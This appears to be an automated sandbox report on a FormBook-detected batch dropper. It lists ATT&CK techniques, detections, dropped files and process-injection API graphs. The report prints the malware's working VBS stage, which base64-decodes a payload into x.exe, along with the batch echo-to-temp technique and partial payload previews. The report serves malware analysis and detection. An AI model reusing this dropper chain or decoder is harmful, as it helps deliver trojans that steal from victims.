            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
            Process Injection            		NTDS12
            System Information Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1546702 Sample: FS001_ DT103024.bat Startdate: 01/11/2024 Architecture: WINDOWS Score: 100 29 Multi AV Scanner detection for submitted file 2->29 31 Yara detected FormBook 2->31 33 Yara detected AntiVM3 2->33 35 6 other signatures 2->35 7 cmd.exe 3 2->7         started        process3 file4 23 C:\Users\user\AppData\Local\Temp\x.vbs, ASCII 7->23 dropped 25 C:\Users\user\AppData\Local\Temp\x, ASCII 7->25 dropped 37 Potential malicious VBS script found (has network functionality) 7->37 39 Command shell drops VBS files 7->39 11 x.exe 3 7->11         started        14 cscript.exe 2 7->14         started        17 conhost.exe 7->17         started        19 findstr.exe 1 7->19         started        signatures5 process6 file7 41 Multi AV Scanner detection for dropped file 11->41 43 Machine Learning detection for dropped file 11->43 45 Injects a PE file into a foreign processes 11->45 21 x.exe 11->21         started        27 C:\Users\user\AppData\Local\Temp\x.exe, PE32 14->27 dropped signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            FS001_ DT103024.bat46%ReversingLabsScript-BAT.Trojan.Heuristic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\x.exe54%ReversingLabsByteCode-MSIL.Backdoor.FormBook

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            No contacted domains info

            World Map of Contacted IPs

            No contacted IP infos

            General Information

            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1546702
            Start date and time:2024-11-01 13:53:09 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 43s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:10
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:FS001_ DT103024.bat
            Detection:MAL
            Classification:mal100.troj.evad.winBAT@10/4@0/0
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 115
            • Number of non-executed functions: 244
            Cookbook Comments:
            • Found application associated with file extension: .bat

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtSetInformationFile calls found.
            • VT rate limit hit for: FS001_ DT103024.bat

            Simulations

            Behavior and APIs

            TimeTypeDescription
            08:54:13API Interceptor5x Sleep call for process: x.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

            Download File
            Process:C:\Users\user\AppData\Local\Temp\x.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1216
            Entropy (8bit):5.34331486778365
            Encrypted:false
            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
            MD5:1330C80CAAC9A0FB172F202485E9B1E8
            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
            Malicious:false
            Reputation:high, very likely benign file
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

            C:\Users\user\AppData\Local\Temp\x

            Download File
            Process:C:\Windows\System32\cmd.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):36864
            Entropy (8bit):4.330257178266755
            Encrypted:false
            SSDEEP:768:jVsJ7OHCni/G+k8y8u8iwwj8CC6jR5XgzAltQT2ZQeXcAiytXhdGx64GIKn+ruxu:GJpi9k7TBwwjpjR5X6ytQT2CesxshAxv
            MD5:775259ADBEF7B230FA1FABF20B6AD50B
            SHA1:0CECA4B5DB2A25EA949BC4DD4AE2D2C71EAB571A
            SHA-256:11FACD5B23564B4D0DC568DE5DA5FE044F92843242882C1CC6AFF478E7B5D16C
            SHA-512:AB1573DE89BAB5287B838EE6090884A8ADE48727CD193746791DBB3A94530F9E996784CC21EDD0FC068E9584DEF3C22FAF68CF11986C0DEB228B390E6D10113E
            Malicious:true
            Reputation:low
            Preview:TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g..aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAD6QI2cAAAAAAAAAAOAAAgELATAAAO..wMAAAoAAAAAAAA2goNAAAgAAAAIA0AAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACA..DQAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAIgKDQBPAA..AAACANAKQlAAAAAAAAAAAAAAAAAAAAAAAAAGANAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAA..AAAAAAAAAAAC50ZXh0AAAAGOsMAAAgAAAA7AwAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNy..YwAAAKQlAAAAIA0AACYAAADuDAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGANAA..ACAAAAFA0AAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAC8Cg0AAAAAAEgAAAAC..AAUAQLgAANBvAAADAAAAhAAABhAoAQB44gsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAFICKBYAAAoAAAIoEQAABn0BAAAEKgAAABMwBQA4AAAAAQAAEQBz..FQAABgoGcgEAAHAXFBZvFAAABgtzFwAACgwHcxgAAAoNCQhy9AAAcG8ZAAAKJggTBCsAEQ..QqEzAFAGEAAAACAAARABkYcxoAAAoKBhYWcgYBAHAoGwAACgYWFwMoGwAACgYXFn

            C:\Users\user\AppData\Local\Temp\x.exe

            Download File
            Process:C:\Windows\System32\cscript.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):857600
            Entropy (8bit):7.733489611061991
            Encrypted:false
            SSDEEP:12288:4n9InteEjOG8rrq9RJLW5lhvZjbQ4i6x8ICU7Pry2uqRqHaUr3eE/32/Q4AyrrRY:4gRpvJWhxjbQFu8zM9Ps32o4JPd
            MD5:431187D149215C1A9B535B0B25EE1FC1
            SHA1:CAF45CC18422A16A390C8E26DFCE455C6967A35E
            SHA-256:52DAB46AA94380F583CF19A17665405168BCF1A222FF75A45F92AB08729CB8CB
            SHA-512:8AFA723608D4FBBCD12E0103659F3AF69AE5AD44C54FA964BD7000592EACDF716A8A22EC2EBE6176EA3A864F42297EB8FC03939C39ADDF25DF05DCDBBA902803
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 54%
            Reputation:low
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.#g..............0......(........... ... ....@.. ....................................@.....................................O.... ...%...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....%... ...&..................@..@.reloc.......`......................@..B........................H.......@....o...........(..x...........................................R.(.......(....}....*....0..8........s......r...p...o.....s......s.......r...po....&...+...*.0..a..........s........r...p(........(.......r...p(........(.......r$..p(........(....s......r2..p...o.....*....0.............s........r...p(........(.......r...p(........(.......r$..p(........(.......r...p(..........O...(....s......r...p...o......{....o.....*....0..F..........s........r...p(.........O...(....s...

            C:\Users\user\AppData\Local\Temp\x.vbs

            Download File
            Process:C:\Windows\System32\cmd.exe
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):380
            Entropy (8bit):5.126074554208653
            Encrypted:false
            SSDEEP:6:jpz7yVHPxORKm6JgCPmu7jjs9lVHEr6Jxlw6mvHFAF1GjyH4BZIkv:NZOmG7jU2r6JAiTrYZnv
            MD5:EC9A2FB69A379D913A4E0A953CD3B97C
            SHA1:A0303ED9F787C042071A1286BBA43A5BBDD0679E
            SHA-256:CF8268D158BB819EF158FF6CCBED64D5E379148A0ADB1F73A082A01D56D0286B
            SHA-512:FEF8E24A680991046BD7DACD6079C7E48C3031FE46CAAE722EA93797EE16C052073BA97959E992EA71AC7AB72FBCEDAA5CF4A410657AAC4C10AD24DE6935E9D6
            Malicious:true
            Reputation:low
            Preview:Set f=CreateObject("Scripting.FileSystemObject")'v..Set p=f.GetSpecialFolder(2)'v..Set i=f.OpenTextFile(p+"\x",1)'v..c=i.ReadAll()'v..i.Close'v..Set x=CreateObject("Msxml2.DOMDocument")'v..Set o=x.CreateElement("base64")'v..o.dataType="bin.base64"'v..o.text=c'v..Set b=CreateObject("ADODB.Stream")'v..b.Type=1'v..b.Open'v..b.Write o.NodeTypedValue'v..b.SaveToFile p+"\x.exe",2'v..

            Static File Info

            General

            File type:DOS batch file, ASCII text, with CRLF line terminators
            Entropy (8bit):6.032087479482034
            TrID:
              File name:FS001_ DT103024.bat
              File size:1'405'358 bytes
              MD5:3f526171c5f8abe5b38acc03f002c6e9
              SHA1:f89f1f5961f3dd53cd76471d7603ae9bfc1fa0c1
              SHA256:ba8888302e61b64da91ce078b99ee2c4afa90f53621f9005be2ffbe7bdde1767
              SHA512:8e8e77b6c611c383925f1395c8263bbf7a29a82efb9883ae47dfaa5c1494a1075b9817d896f5f15e23cb602155cd2f3cebeeb1f29d39e0398d05c536f90def17
              SSDEEP:24576:Tw8yUK6Y/DijNvlPINc+qyJgoOzFIPbIvrNDmy59nX5COv:TAUeujVi/KOct
              TLSH:455568777842A9A1242F5D401F3A79743838FFC71204ACB9DC9B0F7A6990BD6399E1B4
              File Content Preview:@Echo off..echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>%tmp%\x..echo AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g>>%tmp%\x..echo aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAD6QI2cAAAAAAAAAAOAAAgELATAA

              File Icon

              Icon Hash:9686878b929a9886

              Network Behavior

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Nov 1, 2024 13:54:50.386635065 CET5351483162.159.36.2192.168.2.5
              Nov 1, 2024 13:54:51.012722015 CET53501811.1.1.1192.168.2.5

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:08:54:01
              Start date:01/11/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FS001_ DT103024.bat" "
              Imagebase:0x7ff7b9bd0000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:1
              Start time:08:54:01
              Start date:01/11/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:3
              Start time:08:54:12
              Start date:01/11/2024
              Path:C:\Windows\System32\findstr.exe
              Wow64 process (32bit):false
              Commandline:findstr /e "'v" "C:\Users\user\Desktop\FS001_ DT103024.bat"
              Imagebase:0x7ff720bc0000
              File size:36'352 bytes
              MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:true

              General

              Target ID:4
              Start time:08:54:12
              Start date:01/11/2024
              Path:C:\Windows\System32\cscript.exe
              Wow64 process (32bit):false
              Commandline:cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
              Imagebase:0x7ff74ad30000
              File size:161'280 bytes
              MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:true

              General

              Target ID:5
              Start time:08:54:13
              Start date:01/11/2024
              Path:C:\Users\user\AppData\Local\Temp\x.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\x.exe
              Imagebase:0x700000
              File size:857'600 bytes
              MD5 hash:431187D149215C1A9B535B0B25EE1FC1
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 54%, ReversingLabs
              Reputation:low
              Has exited:true

              General

              Target ID:7
              Start time:08:54:15
              Start date:01/11/2024
              Path:C:\Users\user\AppData\Local\Temp\x.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
              Imagebase:0x8c0000
              File size:857'600 bytes
              MD5 hash:431187D149215C1A9B535B0B25EE1FC1
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2389064110.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2388569618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:true

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:9.3%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:4.7%
                Total number of Nodes:191
                Total number of Limit Nodes:9
                execution_graph 50761 1194668 50762 119467f 50761->50762 50763 119468b 50762->50763 50765 1194798 50762->50765 50766 11947bd 50765->50766 50770 1194898 50766->50770 50774 11948a8 50766->50774 50772 11948a4 50770->50772 50771 11949ac 50771->50771 50772->50771 50778 1194508 50772->50778 50775 11948cf 50774->50775 50776 11949ac 50775->50776 50777 1194508 CreateActCtxA 50775->50777 50777->50776 50779 1195938 CreateActCtxA 50778->50779 50781 11959fb 50779->50781 50541 6f6b5d0 50542 6f6b60a 50541->50542 50543 6f6b686 50542->50543 50544 6f6b69b 50542->50544 50549 6f6aef8 50543->50549 50546 6f6aef8 3 API calls 50544->50546 50548 6f6b6aa 50546->50548 50550 6f6af03 50549->50550 50551 6f6b691 50550->50551 50554 6f6bff0 50550->50554 50560 6f6bfdf 50550->50560 50567 6f6af40 50554->50567 50556 6f6c017 50556->50551 50558 6f6c040 CreateIconFromResourceEx 50559 6f6c0be 50558->50559 50559->50551 50561 6f6bff0 50560->50561 50562 6f6af40 CreateIconFromResourceEx 50561->50562 50563 6f6c00a 50562->50563 50564 6f6c017 50563->50564 50565 6f6c040 CreateIconFromResourceEx 50563->50565 50564->50551 50566 6f6c0be 50565->50566 50566->50551 50568 6f6c040 CreateIconFromResourceEx 50567->50568 50569 6f6c00a 50568->50569 50569->50556 50569->50558 50578 6f6a2c0 50579 6f6a30e DrawTextExW 50578->50579 50581 6f6a366 50579->50581 50782 6f6df00 50783 6f6df08 CloseHandle 50782->50783 50784 6f6df6f 50783->50784 50570 119b1b0 50573 119b298 50570->50573 50571 119b1bf 50574 119b2dc 50573->50574 50575 119b2b9 50573->50575 50574->50571 50575->50574 50576 119b4e0 GetModuleHandleW 50575->50576 50577 119b50d 50576->50577 50577->50571 50582 119d540 50583 119d586 50582->50583 50587 119d70f 50583->50587 50590 119d720 50583->50590 50584 119d673 50593 119d2b8 50587->50593 50591 119d74e 50590->50591 50592 119d2b8 DuplicateHandle 50590->50592 50591->50584 50592->50591 50594 119d788 DuplicateHandle 50593->50594 50595 119d74e 50594->50595 50595->50584 50596 6f8eea5 50597 6f8ee23 50596->50597 50598 6f8f081 50597->50598 50601 6f8f830 50597->50601 50605 6f8f820 50597->50605 50602 6f8f845 50601->50602 50609 6f8f860 50602->50609 50603 6f8f857 50603->50598 50606 6f8f830 50605->50606 50608 6f8f860 12 API calls 50606->50608 50607 6f8f857 50607->50598 50608->50607 50610 6f8f88a 50609->50610 50611 6f8f8ae 50610->50611 50627 7d707c0 50610->50627 50631 7d70040 50610->50631 50637 7d705e2 50610->50637 50642 7d70604 50610->50642 50650 7d70618 50610->50650 50655 7d703f9 50610->50655 50660 7d702fd 50610->50660 50665 7d7029e 50610->50665 50670 7d7077f 50610->50670 50674 7d704d0 50610->50674 50679 7d70395 50610->50679 50683 7d70375 50610->50683 50689 7d70256 50610->50689 50694 7d702c8 50610->50694 50699 7d709ee 50610->50699 50611->50603 50703 6f8e6c8 50627->50703 50707 6f8e6c0 50627->50707 50628 7d707de 50632 7d70073 50631->50632 50633 7d70c5e 50632->50633 50711 6f8ea10 50632->50711 50715 6f8ea05 50632->50715 50633->50611 50638 7d705e8 50637->50638 50719 6f8e108 50638->50719 50723 6f8e100 50638->50723 50639 7d70656 50639->50611 50643 7d70611 50642->50643 50644 7d70262 50642->50644 50643->50644 50727 7d70e59 50643->50727 50732 7d70e68 50643->50732 50645 7d70656 50644->50645 50648 6f8e108 ResumeThread 50644->50648 50649 6f8e100 ResumeThread 50644->50649 50645->50611 50648->50645 50649->50645 50651 7d70641 50650->50651 50653 6f8e108 ResumeThread 50651->50653 50654 6f8e100 ResumeThread 50651->50654 50652 7d70656 50652->50611 50653->50652 50654->50652 50656 7d703fc 50655->50656 50745 6f8e788 50656->50745 50749 6f8e781 50656->50749 50657 7d7042e 50661 7d70262 50660->50661 50663 6f8e108 ResumeThread 50661->50663 50664 6f8e100 ResumeThread 50661->50664 50662 7d70656 50662->50611 50663->50662 50664->50662 50666 7d702c1 50665->50666 50668 6f8e788 WriteProcessMemory 50666->50668 50669 6f8e781 WriteProcessMemory 50666->50669 50667 7d7042e 50668->50667 50669->50667 50753 6f8e878 50670->50753 50757 6f8e870 50670->50757 50671 7d707a1 50675 7d704e0 50674->50675 50677 6f8e788 WriteProcessMemory 50675->50677 50678 6f8e781 WriteProcessMemory 50675->50678 50676 7d7051d 50677->50676 50678->50676 50681 6f8e788 WriteProcessMemory 50679->50681 50682 6f8e781 WriteProcessMemory 50679->50682 50680 7d703b9 50681->50680 50682->50680 50684 7d7037b 50683->50684 50685 7d70779 50684->50685 50687 6f8e788 WriteProcessMemory 50684->50687 50688 6f8e781 WriteProcessMemory 50684->50688 50686 7d7051d 50687->50686 50688->50686 50690 7d70262 50689->50690 50692 6f8e108 ResumeThread 50690->50692 50693 6f8e100 ResumeThread 50690->50693 50691 7d70656 50691->50611 50692->50691 50693->50691 50695 7d702d5 50694->50695 50697 6f8e108 ResumeThread 50695->50697 50698 6f8e100 ResumeThread 50695->50698 50696 7d70656 50696->50611 50697->50696 50698->50696 50701 6f8e1b8 Wow64SetThreadContext 50699->50701 50702 6f8e1b2 Wow64SetThreadContext 50699->50702 50700 7d70a08 50701->50700 50702->50700 50704 6f8e708 VirtualAllocEx 50703->50704 50706 6f8e745 50704->50706 50706->50628 50708 6f8e6c8 VirtualAllocEx 50707->50708 50710 6f8e745 50708->50710 50710->50628 50712 6f8ea99 CreateProcessA 50711->50712 50714 6f8ec5b 50712->50714 50716 6f8ea10 CreateProcessA 50715->50716 50718 6f8ec5b 50716->50718 50720 6f8e148 ResumeThread 50719->50720 50722 6f8e179 50720->50722 50722->50639 50724 6f8e108 ResumeThread 50723->50724 50726 6f8e179 50724->50726 50726->50639 50728 7d70e68 50727->50728 50737 6f8e1b8 50728->50737 50741 6f8e1b2 50728->50741 50729 7d70e93 50729->50644 50733 7d70e7d 50732->50733 50735 6f8e1b8 Wow64SetThreadContext 50733->50735 50736 6f8e1b2 Wow64SetThreadContext 50733->50736 50734 7d70e93 50734->50644 50735->50734 50736->50734 50738 6f8e1fd Wow64SetThreadContext 50737->50738 50740 6f8e245 50738->50740 50740->50729 50742 6f8e1b8 Wow64SetThreadContext 50741->50742 50744 6f8e245 50742->50744 50744->50729 50746 6f8e7d0 WriteProcessMemory 50745->50746 50748 6f8e827 50746->50748 50748->50657 50750 6f8e788 WriteProcessMemory 50749->50750 50752 6f8e827 50750->50752 50752->50657 50754 6f8e8c3 ReadProcessMemory 50753->50754 50756 6f8e907 50754->50756 50756->50671 50758 6f8e878 ReadProcessMemory 50757->50758 50760 6f8e907 50758->50760 50760->50671 50529 7d72148 50530 7d722d3 50529->50530 50531 7d7216e 50529->50531 50531->50530 50534 7d723c0 50531->50534 50538 7d723c8 50531->50538 50535 7d723c7 50534->50535 50536 7d723f9 PostMessageW 50534->50536 50535->50536 50537 7d72434 50536->50537 50537->50531 50539 7d723f9 PostMessageW 50538->50539 50540 7d72434 50539->50540 50540->50531

                Executed Functions

                Function 06F9E7E0 Relevance: 11.0, Strings: 8, Instructions: 974COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 294 6f9e7e0-6f9e7ff 295 6f9e9ad-6f9e9ec 294->295 296 6f9e805-6f9e80b 294->296 323 6f9e9ee 295->323 324 6f9e9f0-6f9e9fe 295->324 297 6f9e80d-6f9e814 296->297 298 6f9e84c-6f9e860 296->298 299 6f9e82e-6f9e847 call 6f9cfc0 297->299 300 6f9e816-6f9e823 297->300 301 6f9e882-6f9e88b 298->301 302 6f9e862-6f9e866 298->302 299->298 300->299 304 6f9e88d-6f9e89a 301->304 305 6f9e8a5-6f9e8c1 301->305 302->301 306 6f9e868-6f9e874 302->306 304->305 318 6f9e969-6f9e98d 305->318 319 6f9e8c7-6f9e8d2 305->319 306->301 315 6f9e876-6f9e87c 306->315 315->301 332 6f9e98f 318->332 333 6f9e997 318->333 326 6f9e8ea-6f9e8f1 319->326 327 6f9e8d4-6f9e8da 319->327 323->324 328 6f9ea18-6f9ea32 324->328 329 6f9ea00-6f9ea0d 324->329 330 6f9e8f3-6f9e8fd 326->330 331 6f9e905-6f9e928 call 6f989d4 326->331 334 6f9e8dc 327->334 335 6f9e8de-6f9e8e0 327->335 341 6f9ea79-6f9ea80 328->341 342 6f9ea34-6f9ea3b 328->342 329->328 330->331 343 6f9e939-6f9e94a 331->343 344 6f9e92a-6f9e937 331->344 332->333 333->295 334->326 335->326 345 6f9ea9a-6f9eaa3 341->345 346 6f9ea82-6f9ea8f 341->346 347 6f9ea3d-6f9ea4a 342->347 348 6f9ea55-6f9ea6a 342->348 356 6f9e957-6f9e963 343->356 358 6f9e94c-6f9e94f 343->358 344->343 344->356 349 6f9eaa9-6f9eaac 345->349 350 6f9eaa5-6f9eaa7 345->350 346->345 347->348 348->341 359 6f9ea6c-6f9ea73 348->359 353 6f9eaad-6f9eab1 349->353 350->353 362 6f9eab9-6f9eabe 353->362 356->318 356->319 358->356 359->341 360 6f9eb07 359->360 365 6f9eb0a-6f9eb32 360->365 363 6f9eb01-6f9eb04 362->363 364 6f9eac0-6f9eac7 362->364 366 6f9eac9-6f9ead6 364->366 367 6f9eae1-6f9eaf6 364->367 373 6f9eb39-6f9eb70 365->373 366->367 367->363 371 6f9eaf8-6f9eaff 367->371 371->363 371->373 373->365 381 6f9eb72-6f9eb9a 373->381 382 6f9eb9c-6f9ebaf 381->382 383 6f9ebb2-6f9ebb8 381->383 384 6f9ec28-6f9ec80 383->384 385 6f9ebba-6f9ebc1 383->385 387 6f9ec87-6f9ecdf 384->387 385->387 388 6f9ebc7-6f9ebd7 385->388 394 6f9ece6-6f9edaa 387->394 393 6f9ebdd-6f9ebe1 388->393 388->394 396 6f9ebe4-6f9ebe6 393->396 432 6f9edb2-6f9edd4 394->432 397 6f9ebe8-6f9ebf8 396->397 398 6f9ec0b-6f9ec0d 396->398 408 6f9ebfa-6f9ec09 397->408 409 6f9ebe3 397->409 401 6f9ec1c-6f9ec25 398->401 402 6f9ec0f-6f9ec19 398->402 408->398 408->409 409->396 435 6f9edd6-6f9edf4 432->435 436 6f9ee46-6f9ee9e 435->436 437 6f9edf6-6f9ee06 435->437 441 6f9eea5-6f9efb2 436->441 440 6f9ee0c-6f9ee10 437->440 437->441 443 6f9ee13-6f9ee15 440->443 475 6f9efca-6f9efd0 441->475 476 6f9efb4-6f9efc7 441->476 445 6f9ee29-6f9ee2b 443->445 446 6f9ee17-6f9ee27 443->446 448 6f9ee3a-6f9ee43 445->448 449 6f9ee2d-6f9ee37 445->449 446->445 453 6f9ee12 446->453 453->443 477 6f9f04a-6f9f0a2 475->477 478 6f9efd2-6f9efd9 475->478 480 6f9f0a9-6f9f101 477->480 478->480 481 6f9efdf-6f9efe3 478->481 484 6f9f108-6f9f183 480->484 483 6f9efe9-6f9efed 481->483 481->484 486 6f9eff0-6f9effd 483->486 520 6f9f184-6f9f1e8 484->520 492 6f9efff-6f9f00f 486->492 493 6f9f022-6f9f02f 486->493 501 6f9efef 492->501 502 6f9f011-6f9f020 492->502 503 6f9f03e-6f9f047 493->503 504 6f9f031-6f9f03b 493->504 501->486 502->493 502->501 529 6f9f1ea-6f9f20c 520->529 530 6f9f268-6f9f2c0 529->530 531 6f9f20e-6f9f212 529->531 533 6f9f2c7-6f9f3c0 530->533 532 6f9f218-6f9f21c 531->532 531->533 535 6f9f21f-6f9f22c 532->535 571 6f9f3d8-6f9f3d9 533->571 572 6f9f3c2-6f9f3c8 533->572 540 6f9f22e-6f9f23e 535->540 